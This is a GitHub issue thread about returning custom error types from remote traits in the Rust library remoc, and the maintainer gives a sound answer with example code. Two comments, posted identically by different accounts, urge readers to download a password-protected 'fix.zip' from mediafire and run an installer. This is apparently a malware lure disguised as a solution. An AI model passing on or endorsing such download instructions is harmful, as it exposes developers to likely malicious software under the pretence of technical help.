### ISSUE TITLE
Ability to return custom errors

### ISSUE THREAD

**Issue by CowBoy4mH3LL** [ENQT-GmbH/remoc#21]
Say I have a custom error `SError{message:String}` and I implement `From<std:io:Error>` on it.
Now, from a function, say, `fn(&self) -> Result<(),SError>` in an `rtc::remote` labelled trait, I get an `std:io:error` as a result of calling `await` on some other async function.
Even if I have implemented the `From` cast from `Error` to `SError`, it does not seem to be able to cast between the output Result forms.
Any idea why?

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by surban** [comment]
Your custom error type must be serializable and it must implement `From<CallError>`. 

For example:

    // Custom error type that can convert from CallError.
    #[derive(Debug, serde::Serialize, serde::Deserialize)]
    pub enum IncreaseError {
        Overflow,
        Call(CallError),
    }
    
    impl From<CallError> for IncreaseError {
        fn from(err: CallError) -> Self {
            Self::Call(err)
        }
    }
